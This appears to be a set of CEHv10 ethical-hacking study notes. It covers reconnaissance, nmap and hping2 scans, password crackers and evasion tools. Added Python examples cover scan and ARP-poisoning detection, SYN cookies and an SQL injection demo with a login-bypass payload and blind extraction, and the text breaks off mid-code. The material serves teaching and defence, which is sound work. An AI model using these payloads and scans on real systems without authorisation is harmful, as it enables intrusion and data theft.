CEHv10 Module 01 Introduction to

Ethical Hacking
We will start by defining:
● Program bugs
● Buffer overflows
● Viruses
● Worms
● Trojan Horses
● Denial of Service
● Social Engineering
Different methods used to attack:
● Footprinting
● Scanning
● Enumeration
● Penetration – (Individuals that are unsuccessful at this step may opt
for a Denial of Service attack)
● Escalation of Privilege
● Cover Tracks
● Backdoors
The Security Triangle (CIA Triad)
The CIA triangle or triad comprises the three fundamental pillars of
security. These are:
● Confidentiality
● Integrity
● Availability
Different Types of Attacks
● LAN Attack
● WAN Attack
● Physical Entry
● Stolen Equipment
● Unsecured Wireless Access
● Dial-Up Attack
Security evaluation plan
A very important part of preparing an audit. It requires a document that
records the client's authorization, the rules of engagement and the scope,
and consists of the following:
1. Authorized signature of the client to perform the audit.
2. How and when the audit is carried out.
3. The scope of the audit: what may be accessed and what may not be
accessed.
Type of tests

● Internal Evaluations
● External Evaluations
● Stolen Equipment Evaluations
Ethical Hacking Report

● Preparation
● Result
● Conclusion
Penetration test
methodologies
1. Assessment
2. Policy
3. Implementation
4. Training
5. Audit
CEHv10 Module 02 Footprinting and
Reconnaissance
Footprinting
Most important phase of testing – very time consuming
Footprinting tools
Some of the most well-known tools used for gathering information include:
● WHOIS
● Nslookup
● Web-Based Tools
WHOIS
WHOIS allows you to query the information an organization entered
when they registered their domain.
Nslookup
Nslookup is used to query DNS servers. An nslookup query resolves hostnames
to IP addresses and, via a reverse (PTR) lookup, IP addresses to hostnames.
Many web-based tools are available to help you get hidden domain
information. These services provide whois information, DNS
information, and network queries.
IANA
IANA is an excellent starting point for determining details about a domain.
RIR’s (Regional Internet Registries)
These databases provide an excellent resource to use to research a
domain further, once you have decided what area of the world it is
located in.
Domain Location and Path
Discovery:
If you are unsure of a domain's location, the best way to determine its
position is the traceroute command. Traceroute maps the path to a host by
sending probes with an incrementing TTL in the IP header; each router that
decrements the TTL to zero returns an ICMP Time Exceeded message, revealing
itself as one hop on the path.
Reconnaissance
The first step in security testing
Google hacking may be employed
CEHv10 Module 03
Scanning
Identification Processes
There are numerous ways that this identification process can take place
that includes:
1. War Dialing
2. War Driving
3. Pinging
4. Port Scanning
War Dialing
While some may see war dialing as a dated art, it still has its place in the
hacker’s arsenal of tools. If a thorough footprint has been performed,
phone numbers were most likely found that can be associated with the
organization.
War Driving
This mode of penetration relies on identifying unsecured wireless access
points.
ICMP Ping
Ping is an ICMP (Internet Control Message Protocol) echo request / echo reply exchange
No ping response???
ICMP could be disabled on the target – try a TCP ping instead
Port Scanning
Port scanning lets an attacker determine which services are running on a system.
Identifying vulnerable or insecure services lets the attacker exploit them to gain
unauthorized access.
Scan Types
1. Ping Scan
2. SYN Scan
3. Full Scan
4. ACK Scan
5. XMAS SCAN
6. UDP Basics
Nmap
Nmap (network mapper) is an open source port scanner that can craft packets in
numerous ways, allowing the program to determine which services and OS a host is running.
Find out what ports are open
OS scan (-O) requires root privileges because it sends raw packets
nmap -T4 -F 10.10.0.0/24 – fast scan of the 100 most common ports, enumerates machines quickly
nmap -sV host.domain.com -p 80 – service/version detection on port 80 (banner grabbing)
nmap -sS -sU -Pn -p 1-65535 192.168.1.1 – TCP SYN scan plus UDP scan of all ports, skipping host discovery
To save time, ping sweep to identify live hosts and then port scan the live hosts.
Port Scan Countermeasures
Practice the principle of providing least privilege. Don’t leave ports open and block ICMP
echo requests at the firewall or external router. Allow traffic through the external router
to only specific hosts.
Active Stack Fingerprinting
Active stack fingerprinting relies on subtle differences in the responses to specially crafted
packets.
Nessus or another vulnerability
scanner
One of the best approaches for discovering vulnerabilities on a Windows-based
computer (it covers other platforms as well)
Shows missing patches and weak passwords
Determining the attack surface of
an organization
Run a scan to detect network services in the corporate DMZ
XMAS, FIN, NULL scans
An open port ignores the packet (no reply); a closed port answers with RST
Caveat: this holds only for RFC 793 compliant stacks. Windows replies RST regardless of port state, so these scans are unreliable against it
TCP three way handshake connection
establishment and
termination
Connection Establishment: SYN, SYN-ACK, ACK
Connection Termination: FIN, ACK, FIN, ACK (each side closes its half; the middle ACK and FIN are often combined as FIN-ACK)
Banner grabbing
HTTP/1.1 200 OK
Server: Microsoft IIS/6
Expires: Wed, 26 Feb 2013 01:41:33 GMT
Date: Wed, 26 Feb 2013 02:06:13 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 26 Feb 2013 13:12:11 GMT
ETag: "50ba0543e25c31:89d"
Content-Length: 8156
Netcraft
This is a handy site for legitimate and illegitimate purposes. Its most used feature is that it
shows how long a particular site has been up and what the site is running
Telnet
Telnet can easily be used for banner grabbing from various applications simply by
specifying the target and port.
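The banner grab above, done in code rather than by hand with telnet. This is an added example, not part of the CEH slides: it opens a TCP socket to host:port, sends a minimal HEAD request and reads the service's first reply, then pulls out the Server header. So that it runs offline, a tiny local server (constructed here) answers with an IIS-style header block modelled on the listing above; point grab_banner() at a real host and port and nothing else changes.

```python
"""Banner grabbing over a raw TCP socket (what `telnet host 80` + a HEAD request does by hand).

Added example, not from the CEH slides. The local server and its response are constructed
so the code runs offline.
"""
import socket
import threading

# Constructed sample response, modelled on the IIS header block in the notes above.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"Date: Wed, 26 Feb 2013 02:06:13 GMT\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 8156\r\n"
    b"\r\n"
)


def start_fake_server(response: bytes) -> int:
    """Bind an ephemeral localhost port, answer one connection with `response`, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.recv(1024)          # read (and ignore) whatever the client sent
            conn.sendall(response)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """Connect, send a minimal HEAD request, return whatever the service says first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        # HTTP waits for the client to speak first; SMTP/FTP/SSH greet on their own,
        # so for those you would skip the send and just read.
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break                # server closed the connection
            chunks.append(data)
            if b"\r\n\r\n" in b"".join(chunks):
                break                # end of HTTP headers
    return b"".join(chunks).decode("latin-1", errors="replace")


def parse_headers(banner: str) -> dict:
    """Split an HTTP response into {header-name-lower: value}; the status line is stored under ''."""
    head = banner.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {"": lines[0]}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def server_header(host: str, port: int) -> str:
    """Return the Server header of host:port, or '' if the service does not disclose one."""
    return parse_headers(grab_banner(host, port)).get("server", "")


if __name__ == "__main__":
    p = start_fake_server(SAMPLE_RESPONSE)
    print(server_header("127.0.0.1", p))
```

A hardened server removes or genericises the Server header, so an empty result here is not proof of a non-HTTP service; the status line still tells you it spoke HTTP.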
TCP SYN scanning
Will not evade IDS
TOR network with multi-node
Surf the internet anonymously
Log of Port scan targeting
172.17.17.206
Time: Mar 13 17:30:15 Port: 20 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Mar 13 17:30:17 Port: 21 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Mar 13 17:30:19 Port: 22 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Feb 29 13:21:31 Port: 23 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Feb 29 13:21:32 Port: 25 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Feb 29 13:21:33 Port: 80 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Feb 29 13:21:30 Port: 443 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
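The log above is what a port scan looks like from the defender's side: one source hitting several destination ports on one host within seconds. As an added example (not from the CEH slides), the code below parses lines in that format and flags a source/destination pair that touches at least a threshold number of distinct ports inside a time window. The log lines are constructed to match the listing (same hosts, ports and timestamps, plus one benign hit from another host); the 60-second window and the threshold of 3 ports are assumed tuning values, far lower than production rules would use. Syslog-style lines carry no year, so a leap year is assumed to let "Feb 29" parse.

```python
"""Port scan detection over firewall log lines of the form shown above.

Added example, not from the CEH slides. Log lines are constructed; window and threshold
are assumed tuning values.
"""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
Time: Mar 13 17:30:15 Port: 20 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Mar 13 17:30:17 Port: 21 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Mar 13 17:30:19 Port: 22 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Feb 29 13:21:31 Port: 23 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Feb 29 13:21:32 Port: 25 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Feb 29 13:21:33 Port: 80 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Feb 29 13:21:30 Port: 443 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol: TCP
Time: Feb 29 13:25:00 Port: 80 Source: 172.17.17.50 Destination: 172.17.17.206 Protocol: TCP
"""

LINE_RE = re.compile(
    r"Time:\s*(?P<ts>\w{3} \d{1,2} \d{2}:\d{2}:\d{2})\s+Port:\s*(?P<port>\d+)\s+"
    r"Source:\s*(?P<src>[\d.]+)\s+Destination:\s*(?P<dst>[\d.]+)\s+Protocol:\s*(?P<proto>\w+)"
)
LOG_YEAR = 2012          # assumed: the lines carry no year; a leap year makes "Feb 29" valid
WINDOW_SECONDS = 60      # assumed detection window
PORT_THRESHOLD = 3       # assumed: distinct destination ports per (src, dst) within the window


def parse_log(text: str):
    """Return time-sorted (timestamp, src, dst, port, proto) tuples; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], m["dst"], int(m["port"]), m["proto"]))
    return sorted(events)


def detect_scans(events, window=WINDOW_SECONDS, threshold=PORT_THRESHOLD):
    """Slide a window over each (src, dst) pair's hits; alert once per burst of >= threshold distinct ports."""
    by_pair = defaultdict(list)
    for ts, src, dst, port, _proto in events:
        by_pair[(src, dst)].append((ts, port))     # already time-ordered

    alerts = []
    for (src, dst), hits in by_pair.items():
        i = 0
        while i < len(hits):
            start = hits[i][0]
            ports, j = set(), i
            while j < len(hits) and (hits[j][0] - start).total_seconds() <= window:
                ports.add(hits[j][1])
                j += 1
            if len(ports) >= threshold:
                alerts.append({"src": src, "dst": dst, "start": start, "ports": sorted(ports)})
                i = j          # consume the whole burst so it is reported once
            else:
                i += 1
    return alerts


if __name__ == "__main__":
    for a in detect_scans(parse_log(SAMPLE_LOG)):
        print(f"{a['start']:%b %d %H:%M:%S} scan from {a['src']} -> {a['dst']} ports {a['ports']}")
```

Two bursts are reported for 172.17.17.203 (ports 20-22 on Mar 13 and 23/25/80/443 on Feb 29); the single hit from 172.17.17.50 is not. A slow scan (nmap -T0/-T1) deliberately spreads probes beyond such a window, which is why real detections also keep a long-lived per-source port count.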
Active OS fingerprinting
sends specially crafted packets to the remote OS and analyzes the
received response
ICMP scan using hping2
hping2 -1 host.domain.com
Xmas scan using NMAP
nmap -sX 10.0.0.254
CEHv10 Module 04 Enumeration
Enumeration

Enumeration is the process of extracting user names, machine names, shares, services and other details from the hosts discovered on the network.
Port and services
135 - MS-RPC Endpoint Mapper
137 - NetBIOS Name Service
138 - NetBIOS Datagram Service
139 - NetBIOS Session Service
445 - SMB over TCP / IP (Windows 2K and above)
NetBIOS Null Sessions
The legitimate purpose of a null session is to let unauthenticated
computers obtain browse lists from servers, to permit system accounts
access to network resources, and to allow named pipes to be opened over a null session.
The Inter-Process
Communication Share
Windows computers make communications with each other over the
IPC$ “Inter-Process Communication” share.
515, 631 and 9100
515 is Line Printer Daemon (LPD)
631 is Internet Printing Protocol (IPP)
9100 HP Jet Direct
This host is most likely a printer
net view
Lists file shares
AXFR or IXFR
DNS zone transfers
CEHv10 Module 05 System Hacking
System hacking
System hacking is the point at which an actual connection is made. It is the first true
attack phase: breaking and entering by an attacker through an administrative connection
or an enumerated share.
Maintain Access
Create User Account
Install backdoor
Password Cracking
Dictionary – least time and effort
Brute force – most time and effort
LM Hash
The maximum password length is 14 characters
No case sensitivity: the password is upper-cased, padded and split into two 7-character halves, each used as a DES key
Steganography
Hiding a covert message within an overt message
Security through obscurity
CHNTPW
Linux based tool to change any Windows user's password or to activate
disabled accounts
Counter-based authentication
system
Generates one-time passwords from a shared secret key and a counter that both token and server advance (HOTP)
Password crackers
John the ripper
Hydra
Rainbowcrack
Lophtcrack
Cain
Using john the ripper
Basic syntax is: john passwordfile.txt
/etc/passwd
Does not contain the passwords themselves. The shadow file does.
Pwdump SAM file hash dump
format
USER:RID:LM:NTLM
Dictionary attack
Uses a list of commonly used passwords
Salting
Defeats precomputed rainbow tables by making each stored hash unique to its salt
Privilege Escalation
Vertical - acquiring administrative privileges
Horizontal – acquiring access to another account's files
Multi-factor authentication
Something you know – password or PIN
Something you have – smart card or token
Something you are - biometric
Rainbow Table Attack
Uses a precomputed table of hashed passwords
Shellshock
A GNU bash vulnerability, so Windows systems that do not run bash are unaffected
USB Dumper
Dumps files from USB devices without alerting the user.
CEHv10 Module 06 Malware
Threats
Boot Sector Virus
Copies itself to the original location of the MBR after relocating the original to another
location on the disk
Ransomware
Locks your computer and demands payment to unlock it.
Botnet Trojans
Send junk mail
Participate in coordinated attacks
Host unauthorized content
User Account Control (UAC)
Prompts for consent before a program runs with administrative rights, so a user does not unknowingly execute a potentially malicious program with elevated privileges
Tunneling virus
Installs itself beneath anti-virus monitors by intercepting the interrupt/service-call handlers directly, so its activity bypasses the monitor
DEP
Blocks execution in a non-executable memory location
Macro virus
Infects Microsoft Office files
CEHv10 Module 07 Sniffing
Hosts file
Can be used for DNS poisoning to direct the user to a phishing site
Encryption Protocols
Best defense against sniffing
Syslog
Uses UDP port 514
Wireshark filters
ip.src
ip.dst
tcp.port
tcp.srcport
tcp.dstport
tcptrace
Used to analyze packet capture files
ARP
Broadcasts a request asking which host holds a given IP address; the owner replies with its MAC address. Replies are unauthenticated and cached, which is what ARP poisoning abuses.
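Because ARP replies are trusted blindly, an attacker on a switched LAN poisons the victims' caches so that traffic for the gateway flows through the attacker's NIC, where a sniffer can read it. The following is an added example (not from the CEH slides) of the defensive side: an arpwatch-style monitor that parses ARP replies in tcpdump's `ARP, Reply <ip> is-at <mac>` format and alerts when an IP's MAC changes or one MAC starts answering for several IPs. The capture lines are constructed.

```python
"""ARP cache poisoning detector over tcpdump-style ARP reply lines.

Added example, not from the CEH slides. The capture is constructed: 00:11:22:... are the
legitimate hosts, de:ad:be:ef:00:01 is the attacker's NIC taking over the gateway and a host.
"""
import re
from collections import defaultdict

SAMPLE_CAPTURE = """\
10:00:01.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
10:00:01.100 ARP, Reply 192.168.1.10 is-at 00:11:22:33:44:10, length 28
10:00:01.200 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28
10:00:02.000 ARP, Request who-has 192.168.1.30 tell 192.168.1.10, length 28
10:00:05.000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
10:00:05.050 ARP, Reply 192.168.1.10 is-at de:ad:be:ef:00:01, length 28
10:00:06.000 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28
"""

REPLY_RE = re.compile(r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_capture(text: str):
    """Return [(ip, mac), ...] for ARP replies only; requests and other lines are ignored."""
    pairs = []
    for line in text.splitlines():
        m = REPLY_RE.search(line)
        if m:
            pairs.append((m.group(1), m.group(2).lower()))
    return pairs


class ArpWatch:
    """Tracks IP -> MAC bindings and raises an alert when a binding flips or a MAC multiplies."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)
        self.alerts = []

    def observe(self, ip: str, mac: str):
        previous = self.ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            self.alerts.append(f"{ip} changed from {previous} to {mac}")
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        # One NIC answering for several IPs is the signature of a MITM between them.
        # Caveat: routers with secondary addresses or VRRP do this legitimately; whitelist them.
        if len(self.mac_to_ips[mac]) > 1:
            self.alerts.append(f"{mac} claims {sorted(self.mac_to_ips[mac])}")


def analyse(text: str):
    """Run the monitor over a capture and return its alerts in order."""
    watch = ArpWatch()
    for ip, mac in parse_capture(text):
        watch.observe(ip, mac)
    return watch.alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_CAPTURE):
        print("ALERT:", alert)
```

Static ARP entries for the gateway, or dynamic ARP inspection on the switch, prevent the poisoning itself; the monitor above only tells you it happened.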
Sniffers
Work at Layer 2 and Layer 3 of the OSI model.
Can be used to read PCAP files from IDS’s or other utilities.
Wireshark is a very popular sniffer for both wired and wireless traffic
Tcpdump is a popular command line packet sniffer
Promiscuous mode
Passes all traffic to the CPU vs. only traffic to the local MAC address or broadcasts
Application layer vulnerabilities
Are identical in IPv6 and IPv4
STP manipulation
redirects traffic to attacker’s computer
Network routers
Protocols should be configured with authentication
DNSSEC
Provides origin authentication and integrity for DNS data through signed records; it does not encrypt DNS traffic
CEHv10 Module 08 Social
Engineering
Social engineering
low-tech methods
Piggybacking / Tailgating
Following someone closely through a secure entrance
Click jacking attack
Overlays a transparent iframe on a decoy page so the victim's clicks land on the hidden target site
Pharming
modifying host configuration files or exploiting DNS
Phishing
URL misspelled or similar to the actual domain name
Dumpster diving
Looking for useful information in the trash
CEHv10 Module 09 Denial-of-
Service
Denial of Service
A DoS attack is a type of attack that brings a system offline or otherwise makes a host's
services unavailable to legitimate users; the target need not be compromised.
Common DoS Attack
Popular DoS attacks can be separated into three categories:
1. Bandwidth
2. Protocol
3. Logic
Common DoS Strategies:
● Ping of Death
● SSPing
● Land
● Smurf
● SYN Flood
● Win Nuke
● Jolt2
● Bubonic
● Targa
● Teardrop
DDoS Attack Sequence
● Mass Intrusion
● Attack Phase
Preventing DoS Attacks

No solution provides complete protection against the threat of DoS attacks. However,
there are things you can do to minimize the effect of a DoS attack
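One of the things that can be done against the SYN flood listed above is the SYN cookie, shown here as an added example that is not from the CEH slides. Instead of allocating a half-open connection for every SYN, the server encodes the connection in the initial sequence number of its SYN-ACK as a keyed MAC over the 4-tuple and a coarse timestamp. A real client's ACK carries that number plus one, so the server can verify it and only then allocate state; spoofed SYNs cost it nothing. The bit layout (5-bit time slot, 3-bit MSS index, 24-bit MAC) follows the classic design; the key, addresses and MSS table are constructed, and the code handles IPv4 only.

```python
"""SYN cookies: stateless SYN-ACK sequence numbers that defeat SYN floods.

Added example, not from the CEH slides. SERVER_KEY, MSS_TABLE and the addresses used in
the demo are constructed. IPv4 only.
"""
import hashlib
import hmac
import ipaddress
import struct

SERVER_KEY = b"constructed-server-secret"   # constructed; a real server rotates this regularly
MSS_TABLE = (536, 1300, 1440, 1460)         # MSS values the 3-bit field can name (constructed)
SLOT_SECONDS = 64                           # cookie time granularity
MAX_AGE_SLOTS = 1                           # accept the current and the previous slot only


def _mac24(src_ip, src_port, dst_ip, dst_port, slot):
    """24-bit keyed MAC binding the cookie to this 4-tuple and time slot."""
    data = struct.pack("!4sH4sHI",
                       ipaddress.ip_address(src_ip).packed, src_port,
                       ipaddress.ip_address(dst_ip).packed, dst_port, slot)
    return int.from_bytes(hmac.new(SERVER_KEY, data, hashlib.sha256).digest()[:3], "big")


def make_cookie(src_ip, src_port, dst_ip, dst_port, client_mss, now):
    """ISN for the SYN-ACK: slot(5) | mss index(3) | mac(24). No per-connection state is stored."""
    slot = (now // SLOT_SECONDS) & 0x1F
    idx = 0
    for i, mss in enumerate(MSS_TABLE):          # largest table entry not above the client's MSS
        if mss <= client_mss:
            idx = i
    return (slot << 27) | (idx << 24) | _mac24(src_ip, src_port, dst_ip, dst_port, slot)


def check_cookie(ack, src_ip, src_port, dst_ip, dst_port, now):
    """On the client's ACK: return the negotiated MSS if the cookie is genuine and fresh, else None."""
    cookie = (ack - 1) & 0xFFFFFFFF               # the ACK acknowledges our ISN + 1
    slot, idx, mac = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    current = (now // SLOT_SECONDS) & 0x1F
    if ((current - slot) & 0x1F) > MAX_AGE_SLOTS:
        return None                               # stale cookie (or nonsense from a flood)
    if idx >= len(MSS_TABLE):
        return None
    if mac != _mac24(src_ip, src_port, dst_ip, dst_port, slot):
        return None                               # forged, or replayed from another 4-tuple
    return MSS_TABLE[idx]


if __name__ == "__main__":
    now = 1_000_000
    isn = make_cookie("203.0.113.5", 40000, "198.51.100.10", 80, 1460, now)
    print(hex(isn), check_cookie(isn + 1, "203.0.113.5", 40000, "198.51.100.10", 80, now + 5))
```

The price of statelessness is visible in the code: TCP options that do not fit in the cookie are lost, which is why Linux only switches cookies on once the SYN backlog overflows.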
DoS Scanning Tools

● Find_ddos
● SARA
● DDoSPing
● RID
● Zombie Zapper
DoS and DDoS
Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks are
embarrassing and inconvenient. Both attacks are extremely difficult to prevent from being
attempted. The best defense is a well-designed network that is hard to overwhelm.
CEHv10 Module 10 Session
Hijacking
Spoofing
Spoofing is an act of masquerading or impersonating as another user, whereas session
hijacking tries to attack and take over an existing connection.
Session Hijacking
Session hijacking attacks range from basic sniffing, capturing the traffic of an
authenticated exchange between a client and server, to taking over the established
session so that the server believes it is still talking to the authenticated client.
Session Hijacking Steps
1. The attacker must be able to track and intercept the traffic
2. The attacker must be able to desynchronize the connection
3. The attacker must be able to inject his traffic in place of the victim’s
Types of Hijacking:
● Passive Session Hijacking
● Active Session Hijacking
TCP Concepts
TCP must set up the session. This setup is comprised of three steps:
Client -- SYN --> Server
Client <-- SYN/ACK -- Server
Client -- ACK --> Server
IPSec
Operates at Layer 3
Transport mode protects only the payload; typically used host-to-host on the LAN
Tunnel mode encapsulates the whole IP packet; used for site-to-site VPNs over the internet
ESP provides confidentiality (and optionally integrity and authentication)
AH provides integrity and authenticity but no encryption
CEHv10 Module 11 Hacking
Webservers
Hacking Web Servers
Web hacking is an important topic because much of the Internet is devoted to e-
commerce.
Web Server Identification
While standard web servers run on ports 80 (HTTP) or 443 (HTTPS), there are similar ports
that should be scanned while looking for web-based applications. These include the
following ports:
● 88 – Kerberos
● 2779 - Windows 2000 Web Server
● 8080 – Squid
● 8888 – Alternate Web Server
Web Server Scanning Tools
● Nmap
● Netscan Tools
● Superscan
Web Server Enumeration
Once all the possible web servers have been discovered, the attacker will usually
attempt to enumerate the web server vendor.
Vulnerability Identification
Once the attacker has identified the vendor and version of the web server, he will then
search for vulnerabilities.
Vulnerability Exploitation:
IIS has been noticed to be the target of many attacks, but this is partly because it is so
widely used. Others such as Apache, have also been targeted for attack and have their
share of vulnerabilities.
Types of Web Server Attacks:
● ISAPI DLL Buffer Overflows
● IPP Printer Overflow
● Directory Listing
● Shoveling the Shell
NMAP http-methods script
Enumerates the HTTP methods the server allows (GET, POST, HEAD, PUT, DELETE, TRACE) by sending an OPTIONS request
Msfencode / msfvenom
Can help evade AV
Metasploit
Exploitation framework
CEHv10 Module 12 Hacking Web
Applications
Attacking Web Application Server
Web servers typically listen on TCP port 80 (HTTP) and TCP port 443 (HTTPS). Because
those ports must be open and available to web clients, any firewalls or packet-filtering
devices between the web client and web server must pass traffic destined for them.
Web application software sits on top of the web server software and is reached through
those same open ports, so perimeter filtering alone cannot protect it.
Basic Attacks Steps for Web
Application Server
Hacking web applications is similar to hacking other systems. Hackers follow a five-step
process:
● Scan the network
● Gather information
● Test different attack scenarios
● Planning the attack
● Launch an attack
Injection
#1 on the OWASP Top Ten list (2013 and 2017 editions)
Nikto
Web vulnerability scanner
Insufficient input validation
A software design problem where unexpected input can be entered into an application
Burpsuite
Web proxy tool
XSS prevention
Input validation
Output encoding (escape untrusted data where it is rendered into HTML, JavaScript or URLs)
Simple Object Access Protocol
(SOAP)
Provides a structured model for messaging
Based on XML
Exchanges data between web services
CEHv10 Module 13 SQL Injection
SQL Injection
SQL injection occurs when untrusted input is concatenated into a database query, so that
an attacker can insert SQL statements of their own into the query.
SQL Injection Vulnerabilities
1. Unpatched Systems
2. Blank SA Password
Single quote
Used to try to break out of a valid SQL string literal and trigger a syntax error
Blind SQLi
Generic error page
True/False questions
Time delay
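The three notes above (the single-quote probe, the injection itself and the boolean-blind true/false technique) carried through against a login check, as an added example that is not part of the CEH slides. sqlite3 stands in for the database; the schema and rows are constructed. login_vulnerable() pastes user input into the query text (the bug), login_safe() binds parameters (the fix), and blind_extract() recovers a column value one character at a time when the only oracle is whether the login succeeds.

```python
"""SQL injection against a login check: vulnerable vs. parameterised, plus boolean-blind extraction.

Added example, not from the CEH slides. Schema and rows are constructed.
"""
import sqlite3


def make_db():
    """Constructed user table standing in for the application's database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("admin", "S3cr3t!"), ("alice", "wonderland")])
    return con


def login_vulnerable(con, username, password):
    """The bug: input is pasted into the SQL text, so a quote in the input becomes SQL syntax."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """The fix: bound parameters keep the input as data whatever characters it contains."""
    row = con.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()
    return row[0] if row else None


def quote_breaks_query(con):
    """First probe: a lone single quote turns the concatenated query into a syntax error."""
    try:
        login_vulnerable(con, "'", "x")
        return False
    except sqlite3.OperationalError:
        return True


def blind_extract(con, column, table, where, max_len=64):
    """Boolean-blind: the app only reveals success (welcome page) or failure (generic error),
    so ask one true/false question per character position and candidate character."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            # '-- ' comments out the rest of the original query, including the password check.
            payload = (f"admin' AND substr((SELECT {column} FROM {table} WHERE {where}),"
                       f"{pos},1) = char({code}) -- ")
            if login_vulnerable(con, payload, "irrelevant") is not None:
                recovered += chr(code)
                break
        else:
            return recovered        # no character matched: we are past the end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("quote breaks query:", quote_breaks_query(db))
    print("bypass:", login_vulnerable(db, "nobody", "' OR '1'='1"))
    print("safe:", login_safe(db, "nobody", "' OR '1'='1"))
    print("blind:", blind_extract(db, "password", "users", "username='admin'"))
```

The blind loop needs a few hundred requests for a short value; the "time delay" variant in the notes replaces the true/false page difference with a sleep() in the injected condition when even that difference is hidden.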
CEHv10 Module 14 Hacking
Wireless Networks
Wireless Attacks
● Wireless DoS
● Access Point Spoofing
Kismet
Wireless detection tool
Wireless Intrusion Prevention
System
Used to detect and restrict network access to unauthorized wireless devices, also capable
of searching for and locating rogue access points
RADIUS
Authentication, Authorization, and Accounting (AAA) server
Used in 802.1x authentication
Bluetooth
short-range wireless
Wired Equivalent Privacy (WEP)
Can be attacked by capturing enough packets to crack the key in seconds
MAC filtering
WAP must recognize the client’s MAC address as being authorized to connect
Bluetooth attacks
Bluesnarfing
Bluejacking
Bluesmacking
Bluebugging
Aircrack-ng
802.11 WEP and WPA cracking tool
Evil twin attack
A rogue access point that appears legitimate, set up to eavesdrop on wireless
communications.
WPA2
AES 128 bit
CCMP
CEHv10 Module 15 Hacking Mobile
Platforms
BBProxy
Blackjacking tool
CEHv10 Module 16 Evading IDS,
Firewalls, and Honeypots
Whisker
Web vulnerability scanner with session splicing capabilities
Bastion host
Facilitates separation of duties
IDS evasion
Encryption
Flooding
Unicode Characters
Stateful inspection firewall
Verifies packets belong to an established session
Application firewall
Capable of inspecting content
IDS rule example
alert tcp any any -> 10.0.0.0/24 23 (msg:"Telnet traffic";)
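Why the session splicing that Whisker performs (noted above) defeats a rule like the one above when the IDS inspects packet by packet, and how stream reassembly restores detection. This is an added example, not from the CEH slides: the rule emulated is the Snort rule above with an assumed content:"root" match added, the IDS logic is a minimal stand-in for a real engine, and the traffic is constructed.

```python
"""IDS evasion by session splicing, and the stream reassembly that counters it.

Added example, not from the CEH slides. Emulates: alert tcp any any -> 10.0.0.0/24 23
(content:"root";) where the content match is an assumption; the traffic is constructed.
"""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    payload: bytes


RULE = {"dst_net": ipaddress.ip_network("10.0.0.0/24"), "dport": 23, "content": b"root"}


def header_matches(rule, dst, dport):
    return ipaddress.ip_address(dst) in rule["dst_net"] and dport == rule["dport"]


def detect_per_packet(rule, segments):
    """Naive IDS: inspects each packet alone. Returns the seq of every matching packet."""
    return [s.seq for s in segments
            if header_matches(rule, s.dst, s.dport) and rule["content"] in s.payload]


def detect_with_reassembly(rule, segments):
    """Stream-aware IDS: reassembles each TCP flow in sequence order, then matches the stream."""
    flows = defaultdict(list)
    for s in segments:
        flows[(s.src, s.sport, s.dst, s.dport)].append(s)
    hits = []
    for (src, sport, dst, dport), segs in flows.items():
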